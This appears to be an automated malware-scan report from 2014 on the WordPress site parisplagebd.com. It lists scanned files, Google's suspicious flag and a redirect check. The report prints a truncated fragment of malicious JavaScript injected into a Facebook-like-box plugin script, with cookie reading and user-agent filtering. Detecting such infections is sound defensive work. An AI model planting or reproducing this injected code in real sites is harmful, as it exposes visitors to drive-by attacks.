Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=parisplagebd.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://parisplagebd.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 11 Oct 2014 16:51:38 GMT Location: http://www.parisplagebd.com/ Server: nginx/1.2.1 Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: wfvt_1117884783=5439601a11070; expires=Sat, 11-Oct-2014 17:21:38 GMT; path=/; httponly X-Pingback: http://www.parisplagebd.com/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://www.parisplagebd.com/ | 200 OK Content-Length: 21922 Content-Type: text/html | clean |
http://www.parisplagebd.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96928 Content-Type: application/javascript | clean |
http://www.parisplagebd.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8321 Content-Type: application/javascript | clean |
http://www.parisplagebd.com/wp-content/plugins/cardoza-facebook-like-box/cardozafacebook.js?ver=4.0 | 200 OK Content-Length: 1998 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen jQuery('#height_help').toggle(); }) jQuery('#cfbcolor_scheme').click(function(){ jQuery('#color_scheme_help').toggle(); }) jQuery('#cfbshow_faces').click(function(){ jQuery('#show_faces_help').toggle(); }) jQuery('#cfbstream').click(function(){ jQuery('#stream_help').toggle(); }) jQuery('#cfbheader').click(function(){ jQuery('#header_help').toggle(); }) }) Antivirus reports:
| ||
http://www.parisplagebd.com/wp-content/plugins/vslider/js/vslider.js?ver=4.0 | 200 OK Content-Length: 16534 Content-Type: application/javascript | clean |
http://www.parisplagebd.com/wp-content/themes/simple-catch/js/jquery.cycle.all.min.js?ver=20140315 | 200 OK Content-Length: 28302 Content-Type: application/javascript | clean |
http://www.parisplagebd.com/wp-content/themes/simple-catch/js/simplecatch_slider.js?ver=20140315 | 200 OK Content-Length: 1121 Content-Type: application/javascript | clean |
http://www.parisplagebd.com/wp-content/themes/simple-catch/js/simplecatch_search.js?ver=1.0 | 200 OK Content-Length: 1540 Content-Type: application/javascript | clean |
http://parisplagebd.com/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 11 Oct 2014 16:51:45 GMT Pragma: no-cache Location: http://www.parisplagebd.com/test404page.js Server: nginx/1.2.1 Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_1117884783=5439602109409; expires=Sat, 11-Oct-2014 17:21:45 GMT; path=/; httponly X-Pingback: http://www.parisplagebd.com/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://www.parisplagebd.com/test404page.js | 404 Not Found Content-Length: 10618 Content-Type: text/html | clean |
http://www.parisplagebd.com/page-2/ | 200 OK Content-Length: 15681 Content-Type: text/html | clean |
http://www.parisplagebd.com/apropos/ | 200 OK Content-Length: 12761 Content-Type: text/html | clean |
http://www.parisplagebd.com/conclu/ | 200 OK Content-Length: 13530 Content-Type: text/html | clean |
http://www.parisplagebd.com/conclu2/ | 200 OK Content-Length: 13527 Content-Type: text/html | clean |
http://www.parisplagebd.com/conclu3-2/ | 200 OK Content-Length: 13522 Content-Type: text/html | clean |
http://www.parisplagebd.com/conclu4/ | 200 OK Content-Length: 13523 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: parisplagebd.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 11 Oct 2014 16:51:38 GMT
Location: http://www.parisplagebd.com/
Server: nginx/1.2.1
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_1117884783=5439601a11070; expires=Sat, 11-Oct-2014 17:21:38 GMT; path=/; httponly
X-Pingback: http://www.parisplagebd.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
...0 bytes of data.
GET / HTTP/1.1
Host: parisplagebd.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 11 Oct 2014 16:51:38 GMT
Location: http://www.parisplagebd.com/
Server: nginx/1.2.1
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_1117884783=5439601a11070; expires=Sat, 11-Oct-2014 17:21:38 GMT; path=/; httponly
X-Pingback: http://www.parisplagebd.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: parisplagebd.com
Referer: http://www.google.com/search?q=parisplagebd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: parisplagebd.com
Referer: http://www.google.com/search?q=parisplagebd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.